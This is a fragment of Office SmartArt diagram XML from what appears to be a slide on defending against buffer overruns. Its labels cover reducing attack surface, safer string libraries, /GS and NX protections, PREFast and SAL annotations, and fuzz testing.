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8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FE12AD00-0998-4B7D-B1A2-AB1554DE095F}" type="presOf" srcId="{2EB7A5A3-88D8-4225-90F8-0CBF52BEDCCE}" destId="{4C5FF3AC-D32B-4790-8CBB-F061240F241B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{135DA47A-44BF-421E-8C8A-98D18BE9EE7E}" type="presOf" srcId="{BF376CD9-7A81-4445-BA8E-B073A1E1BE9E}" destId="{2C1B6677-ED1A-459E-A758-B4C349E45BA6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98A05B14-8671-4646-9150-F234FC24653F}" type="presOf" srcId="{CD2DE220-D9A6-4C70-8617-910DB46F203E}" destId="{6A7E4F22-72F7-4183-802C-AD05042B1B0A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{2B455284-0347-4CD2-84D5-7D9DCEC1AFA7}" type="presOf" srcId="{A27F5FB9-C8B9-4B8C-9AFD-F06CE10D2029}" destId="{96854C6F-DB84-4533-A8E0-68991092252B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EEC4F23D-EB2C-4896-9717-28F60F5C9DA0}" type="presOf" srcId="{56F0602E-ABE9-4606-9BFB-C99877391650}" destId="{2913E8C5-9023-4BD3-9A3C-F7E1D37BCDC3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ECF972B8-C759-4D23-B489-94010A451880}" type="presOf" srcId="{F2A1170F-3719-4004-9F25-5721A92E17AE}" destId="{7CAB6769-0AA0-4D70-8891-E51DE41C1AA1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7F8DDC48-CABD-484F-83CD-30D1B73755A2}" type="presOf" srcId="{6E008CEF-796C-4183-8258-F9DFE6388002}" destId="{DBC42F06-893E-4A69-8303-BC18A19499B0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0D1DC69D-0EA8-4B6E-83B3-069F4B270844}" type="presOf" srcId="{08BC0C4E-9191-445E-A0B5-8B16C0999844}" destId="{BC902C47-6528-4A22-A3AA-E3062789E396}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{17C55155-77E8-4435-811E-38CB9EAC1BB6}" type="presParOf" srcId="{4C5FF3AC-D32B-4790-8CBB-F061240F241B}" destId="{2913E8C5-9023-4BD3-9A3C-F7E1D37BCDC3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{32B0F3C6-2043-4C57-987F-5E19AB15C13A}" type="presParOf" srcId="{4C5FF3AC-D32B-4790-8CBB-F061240F241B}" destId="{AE3027F5-FA5E-4E66-84DB-FAAB40461692}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{BF46C90D-42B5-4C73-8810-C53806CFEB16}" type="presParOf" srcId="{4C5FF3AC-D32B-4790-8CBB-F061240F241B}" destId="{BC902C47-6528-4A22-A3AA-E3062789E396}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{9A08CA18-F4F4-4DF8-9951-39F83A9B5718}" type="presParOf" srcId="{4C5FF3AC-D32B-4790-8CBB-F061240F241B}" destId="{039E24FE-B02F-4B04-826F-FBD3C86EE7F8}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{E9F37543-A816-4EF1-90A4-88906E2869EB}" type="presParOf" srcId="{4C5FF3AC-D32B-4790-8CBB-F061240F241B}" destId="{96854C6F-DB84-4533-A8E0-68991092252B}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{189B91CB-2F6B-44B5-A581-1FF891F55C56}" type="presParOf" srcId="{4C5FF3AC-D32B-4790-8CBB-F061240F241B}" destId="{0FEDC5B3-11E8-41B2-A1E3-0E5EF73249A1}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{C44447B4-17E5-4202-936B-E20C587848ED}" type="presParOf" srcId="{4C5FF3AC-D32B-4790-8CBB-F061240F241B}" destId="{7CAB6769-0AA0-4D70-8891-E51DE41C1AA1}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{EAD22AEF-E400-4E34-B12A-4E17EBD3063C}" type="presParOf" srcId="{4C5FF3AC-D32B-4790-8CBB-F061240F241B}" destId="{086C424C-024B-4ECD-9F1D-873507A4B64E}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{B5E2DFCB-E6E6-47C8-A758-8C1915DF37B6}" type="presParOf" srcId="{4C5FF3AC-D32B-4790-8CBB-F061240F241B}" destId="{6A7E4F22-72F7-4183-802C-AD05042B1B0A}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{E42FD14D-DC1D-4329-9BAC-8CA297B99A63}" type="presParOf" srcId="{4C5FF3AC-D32B-4790-8CBB-F061240F241B}" destId="{B6516C03-0906-49F7-BCF8-869ED8A77865}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{E5FE0D24-2032-48DA-8581-82E9B68E16BE}" type="presParOf" srcId="{4C5FF3AC-D32B-4790-8CBB-F061240F241B}" destId="{DBC42F06-893E-4A69-8303-BC18A19499B0}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{02CE9459-FB9C-4732-8CE7-1FBAADEB0414}" type="presParOf" srcId="{4C5FF3AC-D32B-4790-8CBB-F061240F241B}" destId="{355F5B5F-858C-4115-8142-C9317232A6A8}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{AF9A91EE-EB10-4308-A204-E9CA31B3D70D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A8D5A-FA57-4E4F-8F9D-651E1E3642B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81424-4F1B-4C32-9176-6429F5BF20E2}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Finding &amp; Fixing Buffer Overruns</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE889DBC-FD2D-497A-821F-F4EECA79BDD0}" type="parTrans" cxnId="{2C650AF2-C071-483E-9840-4AA4D01CF87B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CEA7358D-9A77-4A3F-BD45-1F0E476D5520}" type="sibTrans" cxnId="{2C650AF2-C071-483E-9840-4AA4D01CF87B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8BB40716-0630-46A0-B1B6-334AEB1BE6CD}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Reduce Attack Surface</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58060913-5CD4-4D07-AA31-9CA00C67ADCC}" type="parTrans" cxnId="{D53B50DC-F6A5-4450-9B9A-8CD59D2CA731}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9B5EADB-02D6-4A1B-AE68-F0CFCEC8F97D}" type="sibTrans" cxnId="{D53B50DC-F6A5-4450-9B9A-8CD59D2CA731}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE9E04CD-C948-4542-B355-8D09676EC0C8}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Search for risky functions and determine data origin</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{92D7F9AA-6013-4046-9DD0-81E1B106D5B1}" type="parTrans" cxnId="{A20CE0F7-29C6-4884-9639-1E57B547A3A4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1C1289E-3FF0-42BE-BC48-2EA56F8F88EA}" type="sibTrans" cxnId="{A20CE0F7-29C6-4884-9639-1E57B547A3A4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{12516D71-D0BA-44A6-A7DC-9FF8A1F4AE76}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Use better libraries and classes (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>strsafe</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>, Safe CRT, STL)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE7B47C4-24FF-4CC2-BAF7-9C6E474E2136}" type="parTrans" cxnId="{131D52C1-AADD-450F-8D02-24C95139F7F7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CC04F2D8-4224-4A1E-A899-C3EB0860D016}" type="sibTrans" cxnId="{131D52C1-AADD-450F-8D02-24C95139F7F7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D201866C-0957-4726-A974-DD013CCD5B65}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>/GS, NX and Heap Checking</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A9BEBEC-FD1D-43C9-9738-B488A1687777}" type="parTrans" cxnId="{A2EB2EC3-1C4E-42EF-B0D5-CD448AECEA6A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6EFB6E8C-876E-467C-914B-BB0519354AFD}" type="sibTrans" cxnId="{A2EB2EC3-1C4E-42EF-B0D5-CD448AECEA6A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{62E2DBAE-C42F-4FC8-B983-1216346C7382}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>PREFast</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t> &amp; SAL</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F597AFEB-D5F0-4ED4-BD53-37B863DF46F0}" type="parTrans" cxnId="{A19CA185-915D-4176-8D96-5DF097D1730B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6099CFCC-96A0-41C8-ABDC-8A3CFB701CB2}" type="sibTrans" cxnId="{A19CA185-915D-4176-8D96-5DF097D1730B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{278B8148-6B56-4029-8110-D6BC4CB7C219}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Fuzz Testing</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{18E0DD48-7C94-4ECC-9FB2-5EF87236AD34}" type="parTrans" cxnId="{4B11AF8E-6452-4E3F-AAC8-AEFB3285C662}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{19C3BCE8-62ED-4551-97D1-DC47D7182484}" type="sibTrans" cxnId="{4B11AF8E-6452-4E3F-AAC8-AEFB3285C662}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C00B4A62-4B89-419B-863B-5E9ADAF18BBF}" type="pres">
      <dgm:prSet presAssocID="{078A8D5A-FA57-4E4F-8F9D-651E1E3642B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9F272-7F0C-4A83-93F7-678F677DFB07}" type="pres">
      <dgm:prSet presAssocID="{E8081424-4F1B-4C32-9176-6429F5BF20E2}" presName="centerShape" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0FA8B366-2DED-4016-9362-F1F5D5F9F60D}" type="pres">
      <dgm:prSet presAssocID="{58060913-5CD4-4D07-AA31-9CA00C67ADCC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582C24F5-D287-4C8D-803C-9DDE826C959D}" type="pres">
      <dgm:prSet presAssocID="{8BB40716-0630-46A0-B1B6-334AEB1BE6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1DA22-BB22-4576-80E3-7E10113F178B}" type="pres">
      <dgm:prSet presAssocID="{92D7F9AA-6013-4046-9DD0-81E1B106D5B1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F027D6DA-38A1-4F16-BF5B-502DACE70935}" type="pres">
      <dgm:prSet presAssocID="{FE9E04CD-C948-4542-B355-8D09676EC0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EBBC-D844-4ABB-87CE-F4AE14452BA8}" type="pres">
      <dgm:prSet presAssocID="{EE7B47C4-24FF-4CC2-BAF7-9C6E474E2136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F6C4937D-DB6E-4FA6-A027-DB6A7EE29810}" type="pres">
      <dgm:prSet presAssocID="{12516D71-D0BA-44A6-A7DC-9FF8A1F4AE7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8B1D8-A670-4410-9E50-5AB59A863BDD}" type="pres">
      <dgm:prSet presAssocID="{7A9BEBEC-FD1D-43C9-9738-B488A1687777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DDE90C8B-7845-4A13-9BF0-D9137E51E1C7}" type="pres">
      <dgm:prSet presAssocID="{D201866C-0957-4726-A974-DD013CCD5B6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F49C3-B7B2-4993-B945-BF1CBC4D4AC4}" type="pres">
      <dgm:prSet presAssocID="{F597AFEB-D5F0-4ED4-BD53-37B863DF46F0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8A2942BE-3BCC-4EC6-AC12-BD2DD6247FC7}" type="pres">
      <dgm:prSet presAssocID="{62E2DBAE-C42F-4FC8-B983-1216346C738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A639B-8868-4CDD-827A-50EFBB7FB4AA}" type="pres">
      <dgm:prSet presAssocID="{18E0DD48-7C94-4ECC-9FB2-5EF87236AD34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6B78D5A7-72A1-44C2-B63E-3B99C7C34B7B}" type="pres">
      <dgm:prSet presAssocID="{278B8148-6B56-4029-8110-D6BC4CB7C21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FAFF6-961B-45DC-9995-1F00A3196A02}" type="presOf" srcId="{D201866C-0957-4726-A974-DD013CCD5B65}" destId="{DDE90C8B-7845-4A13-9BF0-D9137E51E1C7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{CA148CAE-AA0D-4BA0-A4D9-2CF3DFB3387C}" type="presOf" srcId="{18E0DD48-7C94-4ECC-9FB2-5EF87236AD34}" destId="{C4FA639B-8868-4CDD-827A-50EFBB7FB4AA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{C2D2A5C9-35D0-44ED-B961-67E725F5C612}" type="presOf" srcId="{62E2DBAE-C42F-4FC8-B983-1216346C7382}" destId="{8A2942BE-3BCC-4EC6-AC12-BD2DD6247FC7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{A20CE0F7-29C6-4884-9639-1E57B547A3A4}" srcId="{E8081424-4F1B-4C32-9176-6429F5BF20E2}" destId="{FE9E04CD-C948-4542-B355-8D09676EC0C8}" srcOrd="1" destOrd="0" parTransId="{92D7F9AA-6013-4046-9DD0-81E1B106D5B1}" sibTransId="{E1C1289E-3FF0-42BE-BC48-2EA56F8F88EA}"/>
    <dgm:cxn modelId="{6B566A9E-7022-49E1-A625-56D74334FF9A}" type="presOf" srcId="{12516D71-D0BA-44A6-A7DC-9FF8A1F4AE76}" destId="{F6C4937D-DB6E-4FA6-A027-DB6A7EE29810}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{901AEC81-898A-4749-9F20-A40794881668}" type="presOf" srcId="{EE7B47C4-24FF-4CC2-BAF7-9C6E474E2136}" destId="{2131EBBC-D844-4ABB-87CE-F4AE14452BA8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{A2EB2EC3-1C4E-42EF-B0D5-CD448AECEA6A}" srcId="{E8081424-4F1B-4C32-9176-6429F5BF20E2}" destId="{D201866C-0957-4726-A974-DD013CCD5B65}" srcOrd="3" destOrd="0" parTransId="{7A9BEBEC-FD1D-43C9-9738-B488A1687777}" sibTransId="{6EFB6E8C-876E-467C-914B-BB0519354AFD}"/>
    <dgm:cxn modelId="{B14C2BE4-1236-4C18-8BBF-A1542479ED24}" type="presOf" srcId="{92D7F9AA-6013-4046-9DD0-81E1B106D5B1}" destId="{A611DA22-BB22-4576-80E3-7E10113F178B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{C06EEA08-7472-45F3-9774-D0E78E9CC4DF}" type="presOf" srcId="{7A9BEBEC-FD1D-43C9-9738-B488A1687777}" destId="{BC98B1D8-A670-4410-9E50-5AB59A863BDD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{2865EB32-ECC2-4984-8ED0-C2C37790AE11}" type="presOf" srcId="{58060913-5CD4-4D07-AA31-9CA00C67ADCC}" destId="{0FA8B366-2DED-4016-9362-F1F5D5F9F60D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{CFE55231-3B57-4AA1-90BC-6A9BEDCCF1E0}" type="presOf" srcId="{FE9E04CD-C948-4542-B355-8D09676EC0C8}" destId="{F027D6DA-38A1-4F16-BF5B-502DACE70935}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{35F0C540-60FD-4D74-A915-7C49F2C97CFF}" type="presOf" srcId="{E8081424-4F1B-4C32-9176-6429F5BF20E2}" destId="{D239F272-7F0C-4A83-93F7-678F677DFB07}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{6260D6D2-4691-447A-A2CF-091EC10FB0CE}" type="presOf" srcId="{078A8D5A-FA57-4E4F-8F9D-651E1E3642B5}" destId="{C00B4A62-4B89-419B-863B-5E9ADAF18BBF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{9229F5A4-CB44-426C-A7A8-FF953D302BC6}" type="presOf" srcId="{F597AFEB-D5F0-4ED4-BD53-37B863DF46F0}" destId="{A15F49C3-B7B2-4993-B945-BF1CBC4D4AC4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{A19CA185-915D-4176-8D96-5DF097D1730B}" srcId="{E8081424-4F1B-4C32-9176-6429F5BF20E2}" destId="{62E2DBAE-C42F-4FC8-B983-1216346C7382}" srcOrd="4" destOrd="0" parTransId="{F597AFEB-D5F0-4ED4-BD53-37B863DF46F0}" sibTransId="{6099CFCC-96A0-41C8-ABDC-8A3CFB701CB2}"/>
    <dgm:cxn modelId="{2C650AF2-C071-483E-9840-4AA4D01CF87B}" srcId="{078A8D5A-FA57-4E4F-8F9D-651E1E3642B5}" destId="{E8081424-4F1B-4C32-9176-6429F5BF20E2}" srcOrd="0" destOrd="0" parTransId="{DE889DBC-FD2D-497A-821F-F4EECA79BDD0}" sibTransId="{CEA7358D-9A77-4A3F-BD45-1F0E476D5520}"/>
    <dgm:cxn modelId="{131D52C1-AADD-450F-8D02-24C95139F7F7}" srcId="{E8081424-4F1B-4C32-9176-6429F5BF20E2}" destId="{12516D71-D0BA-44A6-A7DC-9FF8A1F4AE76}" srcOrd="2" destOrd="0" parTransId="{EE7B47C4-24FF-4CC2-BAF7-9C6E474E2136}" sibTransId="{CC04F2D8-4224-4A1E-A899-C3EB0860D016}"/>
    <dgm:cxn modelId="{4B11AF8E-6452-4E3F-AAC8-AEFB3285C662}" srcId="{E8081424-4F1B-4C32-9176-6429F5BF20E2}" destId="{278B8148-6B56-4029-8110-D6BC4CB7C219}" srcOrd="5" destOrd="0" parTransId="{18E0DD48-7C94-4ECC-9FB2-5EF87236AD34}" sibTransId="{19C3BCE8-62ED-4551-97D1-DC47D7182484}"/>
    <dgm:cxn modelId="{D53B50DC-F6A5-4450-9B9A-8CD59D2CA731}" srcId="{E8081424-4F1B-4C32-9176-6429F5BF20E2}" destId="{8BB40716-0630-46A0-B1B6-334AEB1BE6CD}" srcOrd="0" destOrd="0" parTransId="{58060913-5CD4-4D07-AA31-9CA00C67ADCC}" sibTransId="{B9B5EADB-02D6-4A1B-AE68-F0CFCEC8F97D}"/>
    <dgm:cxn modelId="{9597745A-FFAB-4758-B00B-D6DA016B4478}" type="presOf" srcId="{278B8148-6B56-4029-8110-D6BC4CB7C219}" destId="{6B78D5A7-72A1-44C2-B63E-3B99C7C34B7B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{7D030544-C928-4E3E-BC35-FB8B707F32D9}" type="presOf" srcId="{8BB40716-0630-46A0-B1B6-334AEB1BE6CD}" destId="{582C24F5-D287-4C8D-803C-9DDE826C959D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{6934026C-E769-46B6-B456-3F5E85D6F66C}" type="presParOf" srcId="{C00B4A62-4B89-419B-863B-5E9ADAF18BBF}" destId="{D239F272-7F0C-4A83-93F7-678F677DFB07}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{01198787-443E-460D-89D5-352C76D467BA}" type="presParOf" srcId="{C00B4A62-4B89-419B-863B-5E9ADAF18BBF}" destId="{0FA8B366-2DED-4016-9362-F1F5D5F9F60D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{20455EB1-A50D-487D-A9A1-BD6272133B84}" type="presParOf" srcId="{C00B4A62-4B89-419B-863B-5E9ADAF18BBF}" destId="{582C24F5-D287-4C8D-803C-9DDE826C959D}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{E39AEE71-CD09-4161-99C9-B67370C76186}" type="presParOf" srcId="{C00B4A62-4B89-419B-863B-5E9ADAF18BBF}" destId="{A611DA22-BB22-4576-80E3-7E10113F178B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{67948563-7D74-45E4-8094-50AD6F8BB864}" type="presParOf" srcId="{C00B4A62-4B89-419B-863B-5E9ADAF18BBF}" destId="{F027D6DA-38A1-4F16-BF5B-502DACE70935}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{6D23A7E7-0590-4AC8-894A-D8B937BBD447}" type="presParOf" srcId="{C00B4A62-4B89-419B-863B-5E9ADAF18BBF}" destId="{2131EBBC-D844-4ABB-87CE-F4AE14452BA8}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{7DB4AD98-5A95-43A2-84AB-81E0AEA850B1}" type="presParOf" srcId="{C00B4A62-4B89-419B-863B-5E9ADAF18BBF}" destId="{F6C4937D-DB6E-4FA6-A027-DB6A7EE29810}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{6C10B5C9-6CCB-4193-98C6-BE9BB0FE5DF9}" type="presParOf" srcId="{C00B4A62-4B89-419B-863B-5E9ADAF18BBF}" destId="{BC98B1D8-A670-4410-9E50-5AB59A863BDD}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{9737A76B-8B47-47B4-AF8A-74AE7BF4A519}" type="presParOf" srcId="{C00B4A62-4B89-419B-863B-5E9ADAF18BBF}" destId="{DDE90C8B-7845-4A13-9BF0-D9137E51E1C7}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{12D9D47C-2D63-44F1-89E8-FCABC83BA8A1}" type="presParOf" srcId="{C00B4A62-4B89-419B-863B-5E9ADAF18BBF}" destId="{A15F49C3-B7B2-4993-B945-BF1CBC4D4AC4}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{1CB7DB2F-060C-4296-B70B-9F9E45E4CD36}" type="presParOf" srcId="{C00B4A62-4B89-419B-863B-5E9ADAF18BBF}" destId="{8A2942BE-3BCC-4EC6-AC12-BD2DD6247FC7}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{3B76DD68-798C-4A5A-979B-E5F156E7D487}" type="presParOf" srcId="{C00B4A62-4B89-419B-863B-5E9ADAF18BBF}" destId="{C4FA639B-8868-4CDD-827A-50EFBB7FB4AA}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/radial4"/>
    <dgm:cxn modelId="{4B26981C-7E4D-4A2A-82D8-4614102ECA31}" type="presParOf" srcId="{C00B4A62-4B89-419B-863B-5E9ADAF18BBF}" destId="{6B78D5A7-72A1-44C2-B63E-3B99C7C34B7B}" srcOrd="12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8A7805-0591-4B75-8C0D-30381D91DD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66DF00-A8D9-4233-A54D-AB9ECC053D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910BB-FFBA-4FF1-968E-EEEDD7ECA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AA645-2CC0-491D-BE4A-DC726ED8E2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EF491A-77BD-418E-8E9C-507CE02BEE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73B05-638F-4D4C-9F8D-38A6526D5C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652856-830B-41B7-9B6D-E881862A37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4D675-3E2B-4307-B1F7-C1AE9312EB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65FCD8-AD7B-44D3-9CBC-4F8D7D2920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6B2F18-2441-4ED7-B1A9-ACCFAD8158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9687